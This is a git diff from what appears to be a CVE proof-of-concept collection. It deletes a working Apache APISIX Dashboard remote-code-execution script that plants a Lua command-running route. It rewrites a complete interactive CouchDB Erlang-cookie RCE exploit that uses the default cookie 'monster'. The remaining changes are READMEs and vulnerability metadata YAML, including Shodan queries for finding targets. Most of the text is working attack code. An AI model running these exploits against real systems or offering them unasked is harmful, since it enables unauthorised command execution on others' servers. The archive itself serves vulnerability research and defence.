diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py b/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
deleted file mode 100644
index edd12c9f1d0ba6168ef5179a32a544486d7213dc..0000000000000000000000000000000000000000
--- a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
+++ /dev/null
@@ -1,93 +0,0 @@
-#!/usr/bin/env python3
-import zlib
-import json
-import random
-import requests
-import string
-import sys
-from urllib3.exceptions import InsecureRequestWarning
-
-# Suppress only the single warning from urllib3 needed.
-requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
-
-
-eval_config = {
- "Counsumers": [],
- "Routes": [
- {
- "id": str(random.randint(100000000000000000, 1000000000000000000)),
- "create_time": 1640674554,
- "update_time": 1640677637,
- "uris": [
- "/rce"
- ],
- "name": "rce",
- "methods": [
- "GET",
- "POST",
- "PUT",
- "DELETE",
- "PATCH",
- "HEAD",
- "OPTIONS",
- "CONNECT",
- "TRACE"
- ],
- "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
- "status": 1
- }
- ],
- "Services": [],
- "SSLs": [],
- "Upstreams": [],
- "Scripts": [],
- "GlobalPlugins": [],
- "PluginConfigs": []
-}
-
-
-def random_str():
- return ''.join(random.choices(string.ascii_letters + string.digits, k=6))
-
-
-def calc_crc(data):
- crc32 = zlib.crc32(data) & 0xffffffff
- return crc32.to_bytes(4, byteorder="big")
-
-
-def export_data(url):
- r = requests.get(url + "/apisix/admin/migrate/export", verify=False)
- return r.text[:-4]
-
-
-def import_data(url, data):
- data = json.dumps(data).encode()
- crc32 = calc_crc(data)
-
- files = {"file": ("data", data + crc32, "text/data")}
- resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False)
- # print(resp.text)
- if resp.json().get("code", -1) == 0:
- return True
- else:
- return False
-
-
-if __name__ == "__main__":
- if len(sys.argv) != 2:
- print("python " + sys.argv[0] + " http://127.0.0.1:9000")
- exit()
-
- url = sys.argv[1]
- if url.endswith("/"):
- url = url[:-1]
-
- uri = random_str()
- eval_config["Routes"][0]["uris"] = [ "/" + uri]
- eval_config["Routes"][0]["name"] = uri
-
- if import_data(url, eval_config):
- print("attack success")
- print("uri is: " + "/" 
+ uri)
- else:
- print("attack error")
\ No newline at end of file
diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml
index ad102017e26ecb22741a65bbfed063bfe70dcce9..3041c77691c888a6c2abd26d4808d2f3d5cf123c 100644
--- a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml
+++ b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml
@@ -1,22 +1,22 @@
-id: CVE-2021-45232
-source: https://github.com/wuppp/cve-2021-45232-exp
-info:
- name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。
- severity: CRITICAL
- description:
- CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。
- scope-of-influence:
- In Apache APISIX Dashboard before 2.10.1
- reference:
- - http://www.openwall.com/lists/oss-security/2021/12/27/1
- - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232
- - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5
- - https://seclists.org/oss-sec/2021/q4/180
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2021-45232
- cwe-id: CWE-306
- cnvd-id: None
- kve-id: None
+id: CVE-2021-45232
+source: https://github.com/wuppp/cve-2021-45232-exp
+info:
+ name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。
+ severity: CRITICAL
+ description:
+ CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。
+ scope-of-influence:
+ In Apache APISIX Dashboard before 2.10.1
+ reference:
+ - http://www.openwall.com/lists/oss-security/2021/12/27/1
+ - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232
+ - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5
+ - https://seclists.org/oss-sec/2021/q4/180
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-45232
+ cwe-id: CWE-306
+ cnvd-id: None
+ kve-id: None
 tags: cve2021
\ No newline at end of file
diff --git a/cve/Froxlor/2023/CVE-2023-0315/README.md b/cve/Froxlor/2023/CVE-2023-0315/README.md
index d0fe71ba89cc6d5e5d30594e95341686d0f35559..cfd00af28925574386fc195d8af2713ca63929fa 100644
--- a/cve/Froxlor/2023/CVE-2023-0315/README.md
+++ b/cve/Froxlor/2023/CVE-2023-0315/README.md
@@ -1,28 +1,28 @@
-# CVE-2023-0315 Proof-of-Concept
-### Overview
-This is a Remote Code Execution Proof-of-Concept for Froxlor 2.0.3 Stable Vulnerability CVE-2023-0315.
-It exploits a command injection vulnerability in Froxlor prior to version 2.0.8.
-An authenticated attacker can achieve a full remote command execution on OS level under the web server user.
-For a comprehensive understanding, check out the accompanying [blog post](https://huntr.dev/bounties/ff4e177b-ba48-4913-bbfa-ab8ce0db5943) for in-depth details.
-
-### Dependencies
-* Froxlor 2.0.3 Stable
-* Python 3.8+
-* `requests` Python Library
-* `beautifulsoup4` Python Library
-* Ubuntu 20.04
-* PHP 8.2
-### Usage
-
-1.Verify the required libraries are installed:
-```
-pip install requests beautifulsoup4
-```
-2.Change the target URL, credentials, and any other required variables to match your vulnerable Froxlor instance.
-
-3.Run the PoC:
-```
-python cve-2023-0315.py
-```
-### Additional Information
-This PoC targets Froxlor 2.0.3 Stable and has been tested on Ubuntu 20.04 with PHP 8.2. The vulnerability was patched in Froxlor version 2.0.8. To protect against this vulnerability, it is recommended to update Froxlor to the latest version.
+# CVE-2023-0315 Proof-of-Concept
+### Overview
+This is a Remote Code Execution Proof-of-Concept for Froxlor 2.0.3 Stable Vulnerability CVE-2023-0315.
+It exploits a command injection vulnerability in Froxlor prior to version 2.0.8.
+An authenticated attacker can achieve a full remote command execution on OS level under the web server user.
+For a comprehensive understanding, check out the accompanying [blog post](https://huntr.dev/bounties/ff4e177b-ba48-4913-bbfa-ab8ce0db5943) for in-depth details.
+
+### Dependencies
+* Froxlor 2.0.3 Stable
+* Python 3.8+
+* `requests` Python Library
+* `beautifulsoup4` Python Library
+* Ubuntu 20.04
+* PHP 8.2
+### Usage
+
+1.Verify the required libraries are installed:
+```
+pip install requests beautifulsoup4
+```
+2.Change the target URL, credentials, and any other required variables to match your vulnerable Froxlor instance.
+
+3.Run the PoC:
+```
+python cve-2023-0315.py
+```
+### Additional Information
+This PoC targets Froxlor 2.0.3 Stable and has been tested on Ubuntu 20.04 with PHP 8.2. The vulnerability was patched in Froxlor version 2.0.8. To protect against this vulnerability, it is recommended to update Froxlor to the latest version.
diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
index 5823536abbef629b12ff077f4ea608daf7ab157d..d0b9db0de60b1635c0ec91c214025ad4a0966973 100644
--- a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
+++ b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
@@ -1,21 +1,21 @@
-id: CVE-2023-0315
-source:
- https://github.com/mhaskar/CVE-2023-0315
-info:
- name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
- severity: high
- description: |
- Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。
- scope-of-influence:
- Froxlor 2.0.8 之前的版本
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2023-0315
- - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.8
- cve-id: CVE-2023-0315
- cwe-id: CWE-77
- cnvd-id: None
- kve-id: None
- tags: 远程代码执行, RCE
+id: CVE-2023-0315
+source:
+ https://github.com/mhaskar/CVE-2023-0315
+info:
+ name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
+ severity: high
+ description: |
+ Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。
+ scope-of-influence:
+ Froxlor 2.0.8 之前的版本
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-0315
+ - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2023-0315
+ cwe-id: CWE-77
+ cnvd-id: None
+ kve-id: None
+ tags: 远程代码执行, RCE
diff --git a/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml b/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml
index e4ffd901215e4b0b6ae8be0bc862d05aba547459..a0a833e06766cde7540ad812ecf9c475065d726e 100644
--- a/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml
+++ b/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml
@@ -1,22 +1,22 @@
-id: CVE-2021-21315
-source: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
-info:
- name: Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。
- severity: HIGH
- description: |
- Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。
- scope-of-influence:
- Node.js-systeminformation<5.3.1
- reference:
- - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
- - https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525
- - https://security.netapp.com/advisory/ntap-20210312-0007/
- - https://www.npmjs.com/package/systeminformation
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 7.8
- cve-id: CVE-2021-21315
- cwe-id: CWE-78
- cnvd-id: None
- kve-id: None
+id: CVE-2021-21315
+source: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
+info:
+ name: Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。
+ severity: HIGH
+ description: |
+ Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。
+ scope-of-influence:
+ Node.js-systeminformation<5.3.1
+ reference:
+ - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
+ - https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525
+ - https://security.netapp.com/advisory/ntap-20210312-0007/
+ - https://www.npmjs.com/package/systeminformation
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2021-21315
+ cwe-id: CWE-78
+ cnvd-id: None
+ kve-id: None
 tags: cve2021, 系统入侵
\ No newline at end of file
diff --git a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml
index 11f0fd086319ad74ef1f9036891f68b337111330..497f08e0b288cc0acb7d09a48ab7fd128a7579b1 100644
--- a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml
+++ b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml
@@ -1,19 +1,19 @@
-id: CVE-2023-23397
-source: https://github.com/Trackflaw/CVE-2023-23397
-info:
- name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。
- severity: critical
- description: |
- Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability).
- scope-of-influence:
- outlook-2013, outlook-2016, outlook-2019
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2023-23397
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2023-23397
- cwe-id: CWE-294
- cnvd-id: None
- kve-id: None
+id: CVE-2023-23397
+source: https://github.com/Trackflaw/CVE-2023-23397
+info:
+ name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。
+ severity: critical
+ description: |
+ Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability).
+ scope-of-influence:
+ outlook-2013, outlook-2016, outlook-2019
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-23397
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-23397
+ cwe-id: CWE-294
+ cnvd-id: None
+ kve-id: None
 tags: Microsoft, Outlook, cve2023, 权限提升漏洞
\ No newline at end of file
diff --git a/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py b/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py
index 94a6e36024cf1f1d89edbbc35e211da195c8bcbd..5b9c6d1fb71beac66e37aee92341413d4302374b 100644
--- a/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py
+++ b/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py
@@ -1,136 +1,136 @@
-# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)
-# Date: 2022-01-21
-# Exploit Author: Konstantin Burov, @_sadshade
-# Software Link: https://couchdb.apache.org/
-# Version: 3.2.1 and below
-# Tested on: Kali 2021.2
-# Based on 1F98D's Erlang Cookie - Remote Code Execution
-# Shodan: port:4369 "name couchdb at"
-# CVE: CVE-2022-24706
-# References:
-# https://habr.com/ru/post/661195/
-# https://www.exploit-db.com/exploits/49418
-# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
-# https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
-#
-#
-#!/usr/local/bin/python3
-
-import socket
-from hashlib import md5
-import struct
-import sys
-import re
-import time
-
-TARGET = ""
-EPMD_PORT = 4369 # Default Erlang distributed port
-COOKIE = "monster" # Default Erlang cookie for CouchDB
-ERLNAG_PORT = 0
-EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list
-
-# Some data:
-NAME_MSG = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA"
-CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"
-CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"
-CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"
-
-
-def compile_cmd(CMD):
- MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00"
- MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
- MSG += struct.pack(">H", len(CMD))
- MSG += bytes(CMD, 'ascii')
- MSG += b'jw\x04user'
- PAYLOAD = b'\x70' + CTRL_DATA + MSG
- PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD
- return PAYLOAD
-
-print("Remote Command Execution via Erlang Distribution Protocol.\n")
-
-while not TARGET:
- TARGET = input("Enter target host:\n> ")
-
-# Connect to EPMD:
-try:
- epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- epm_socket.connect((TARGET, EPMD_PORT))
-except socket.error as msg:
- print("Couldnt connect to EPMD: %s\n terminating program" % msg)
- sys.exit(1)
- 
-epm_socket.send(EPM_NAME_CMD) #request Erlang nodes
-if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK
- data = epm_socket.recv(1024)
- data = data[0:len(data) - 1].decode('ascii')
- data = data.split("\n")
- if len(data) == 1:
- choise = 1
- print("Found " + data[0])
- else:
- print("\nMore than one node found, choose which one to use:")
- line_number = 0
- for line in data:
- line_number += 1
- print(" %d) %s" %(line_number, line))
- choise = int(input("\n> "))
-
- ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0])
-else:
- print("Node list request error, exiting")
- sys.exit(1)
-epm_socket.close()
-
-# Connect to Erlang port:
-try:
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((TARGET, ERLNAG_PORT))
-except socket.error as msg:
- print("Couldnt connect to Erlang server: %s\n terminating program" % msg)
- sys.exit(1)
-
-s.send(NAME_MSG)
-s.recv(5) # Receive "ok" message
-challenge = s.recv(1024) # Receive "challenge" message
-challenge = struct.unpack(">I", challenge[9:13])[0]
-
-#print("Extracted challenge: {}".format(challenge))
-
-# Add Challenge Digest
-CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii")
- + bytes(str(challenge), "ascii")).digest()
-s.send(CHALLENGE_REPLY)
-CHALLENGE_RESPONSE = s.recv(1024)
-
-if len(CHALLENGE_RESPONSE) == 0:
- print("Authentication failed, exiting")
- sys.exit(1)
-
-print("Authentication successful")
-print("Enter command:\n")
-
-data_size = 0
-while True:
- if data_size <= 0:
- CMD = input("> ")
- if not CMD:
- continue
- elif CMD == "exit":
- sys.exit(0)
- s.send(compile_cmd(CMD))
- data_size = struct.unpack(">I", s.recv(4))[0] # Get data size
- s.recv(45) # Control message
- data_size -= 45 # Data size without control message
- time.sleep(0.1)
- elif data_size < 1024:
- data = s.recv(data_size)
- #print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
- time.sleep(0.1)
- print(data.decode())
- data_size = 0
- else:
- data = s.recv(1024)
- #print("L---data_size: %d, data_recv_size: 
%d" %(data_size,len(data)))
- time.sleep(0.1)
- print(data.decode(),end = '')
+# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)
+# Date: 2022-01-21
+# Exploit Author: Konstantin Burov, @_sadshade
+# Software Link: https://couchdb.apache.org/
+# Version: 3.2.1 and below
+# Tested on: Kali 2021.2
+# Based on 1F98D's Erlang Cookie - Remote Code Execution
+# Shodan: port:4369 "name couchdb at"
+# CVE: CVE-2022-24706
+# References:
+# https://habr.com/ru/post/661195/
+# https://www.exploit-db.com/exploits/49418
+# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
+# https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
+#
+#
+#!/usr/local/bin/python3
+
+import socket
+from hashlib import md5
+import struct
+import sys
+import re
+import time
+
+TARGET = ""
+EPMD_PORT = 4369 # Default Erlang distributed port
+COOKIE = "monster" # Default Erlang cookie for CouchDB
+ERLNAG_PORT = 0
+EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list
+
+# Some data:
+NAME_MSG = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA"
+CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"
+CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"
+CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"
+
+
+def compile_cmd(CMD):
+ MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00"
+ MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
+ MSG += struct.pack(">H", len(CMD))
+ MSG += bytes(CMD, 'ascii')
+ MSG += b'jw\x04user'
+ PAYLOAD = b'\x70' + CTRL_DATA + MSG
+ PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD
+ return PAYLOAD
+
+print("Remote Command Execution via Erlang Distribution Protocol.\n")
+
+while not TARGET:
+ TARGET = input("Enter target host:\n> ")
+
+# Connect to EPMD:
+try:
+ epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ epm_socket.connect((TARGET, EPMD_PORT))
+except socket.error as msg:
+ print("Couldnt connect to EPMD: %s\n 
terminating program" % msg)
+ sys.exit(1)
+
+epm_socket.send(EPM_NAME_CMD) #request Erlang nodes
+if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK
+ data = epm_socket.recv(1024)
+ data = data[0:len(data) - 1].decode('ascii')
+ data = data.split("\n")
+ if len(data) == 1:
+ choise = 1
+ print("Found " + data[0])
+ else:
+ print("\nMore than one node found, choose which one to use:")
+ line_number = 0
+ for line in data:
+ line_number += 1
+ print(" %d) %s" %(line_number, line))
+ choise = int(input("\n> "))
+
+ ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0])
+else:
+ print("Node list request error, exiting")
+ sys.exit(1)
+epm_socket.close()
+
+# Connect to Erlang port:
+try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((TARGET, ERLNAG_PORT))
+except socket.error as msg:
+ print("Couldnt connect to Erlang server: %s\n terminating program" % msg)
+ sys.exit(1)
+
+s.send(NAME_MSG)
+s.recv(5) # Receive "ok" message
+challenge = s.recv(1024) # Receive "challenge" message
+challenge = struct.unpack(">I", challenge[9:13])[0]
+
+#print("Extracted challenge: {}".format(challenge))
+
+# Add Challenge Digest
+CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii")
+ + bytes(str(challenge), "ascii")).digest()
+s.send(CHALLENGE_REPLY)
+CHALLENGE_RESPONSE = s.recv(1024)
+
+if len(CHALLENGE_RESPONSE) == 0:
+ print("Authentication failed, exiting")
+ sys.exit(1)
+
+print("Authentication successful")
+print("Enter command:\n")
+
+data_size = 0
+while True:
+ if data_size <= 0:
+ CMD = input("> ")
+ if not CMD:
+ continue
+ elif CMD == "exit":
+ sys.exit(0)
+ s.send(compile_cmd(CMD))
+ data_size = struct.unpack(">I", s.recv(4))[0] # Get data size
+ s.recv(45) # Control message
+ data_size -= 45 # Data size without control message
+ time.sleep(0.1)
+ elif data_size < 1024:
+ data = s.recv(data_size)
+ #print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
+ time.sleep(0.1)
+ print(data.decode())
+ data_size = 0
+ else:
+ data = s.recv(1024)
+ 
#print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
+ time.sleep(0.1)
+ print(data.decode(),end = '')
 data_size -= 1024
\ No newline at end of file
diff --git a/cve/apache-CouchDB/2022/CVE-2022-24706/README.md b/cve/apache-CouchDB/2022/CVE-2022-24706/README.md
index b001885847d8d79b55361cea7bb6f4884bda32ea..73708b8f9f3bc3e28523840bc45a9af73dc86c5d 100644
--- a/cve/apache-CouchDB/2022/CVE-2022-24706/README.md
+++ b/cve/apache-CouchDB/2022/CVE-2022-24706/README.md
@@ -1,26 +1,26 @@
-# Apache CouchDB 3.2.1 - Remote Code Execution (RCE) CVE-2022-24706
-Date: 2022-01-21
-
-Exploit Author: Konstantin Burov, @_sadshade
-
-Software Link: https://couchdb.apache.org/
-
-Version: 3.2.1 and below
-
-Tested on: Kali 2021.2
-
-Based on 1F98D's Erlang Cookie - Remote Code Execution
-
-Shodan: port:4369 "name couchdb at"
-
-CVE: CVE-2022-24706
-
-References:
-
-https://habr.com/ru/post/661195/
-
-https://www.exploit-db.com/exploits/49418
-
-https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
-
+# Apache CouchDB 3.2.1 - Remote Code Execution (RCE) CVE-2022-24706
+Date: 2022-01-21
+
+Exploit Author: Konstantin Burov, @_sadshade
+
+Software Link: https://couchdb.apache.org/
+
+Version: 3.2.1 and below
+
+Tested on: Kali 2021.2
+
+Based on 1F98D's Erlang Cookie - Remote Code Execution
+
+Shodan: port:4369 "name couchdb at"
+
+CVE: CVE-2022-24706
+
+References:
+
+https://habr.com/ru/post/661195/
+
+https://www.exploit-db.com/exploits/49418
+
+https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
+
 https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
\ No newline at end of file
diff --git a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml
index 50fd50933b6fd9d54ff9e4a4ad5160724bc76d9b..948e103ce736a38cdd4385322a4d9dfaf439fc2b 100644
--- a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml
+++ b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml 
@@ -1,32 +1,32 @@
-id: CVE-2022-24706
-source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit
-info:
- name: Apache CouchDB 是一个面向文档的数据库管理系统。
- severity: critical
- description:
- 当CouchDB 以集群模式安装时,会开启epmd服务,并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster,若未经修改,则攻击者可利用该cookie连接epmd,在知道fqdn的情况下执行任意代码,控制服务器。
- scope-of-influence:
- apache-CouchDB < 3.2.2
- reference:
- - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-...
- - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code...
- - http://www.openwall.com/lists/oss-security/2022/04/26/1
- - http://www.openwall.com/lists/oss-security/2022/05/09/1
- - http://www.openwall.com/lists/oss-security/2022/05/09/2
- - http://www.openwall.com/lists/oss-security/2022/05/09/3
- - http://www.openwall.com/lists/oss-security/2022/05/09/4
- - https://docs.couchdb.org/en/3.2.2/setup/cluster.html
- - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00
- - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti...
- - https://www.openwall.com/lists/oss-security/2022/04/26/1
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-24706
- cwe-id: CWE-1188
- cnvd-id: None
- kve-id: None
- tags:
- - 不安全的默认资源初始化
- - 弱口令要求
+id: CVE-2022-24706
+source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit
+info:
+ name: Apache CouchDB 是一个面向文档的数据库管理系统。
+ severity: critical
+ description:
+ 当CouchDB 以集群模式安装时,会开启epmd服务,并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster,若未经修改,则攻击者可利用该cookie连接epmd,在知道fqdn的情况下执行任意代码,控制服务器。
+ scope-of-influence:
+ apache-CouchDB < 3.2.2
+ reference:
+ - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-...
+ - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code...
+ - http://www.openwall.com/lists/oss-security/2022/04/26/1
+ - http://www.openwall.com/lists/oss-security/2022/05/09/1
+ - http://www.openwall.com/lists/oss-security/2022/05/09/2
+ - http://www.openwall.com/lists/oss-security/2022/05/09/3
+ - http://www.openwall.com/lists/oss-security/2022/05/09/4
+ - https://docs.couchdb.org/en/3.2.2/setup/cluster.html
+ - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00
+ - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti...
+ - https://www.openwall.com/lists/oss-security/2022/04/26/1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-24706
+ cwe-id: CWE-1188
+ cnvd-id: None
+ kve-id: None
+ tags:
+ - 不安全的默认资源初始化
+ - 弱口令要求
 - 远程代码执行
\ No newline at end of file
diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml
index 684c223ab072bfdd3b63b13980189c50587b0c5c..ed82fde27a0b61684b15b8135e50115dde8fda27 100644
--- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml
+++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml
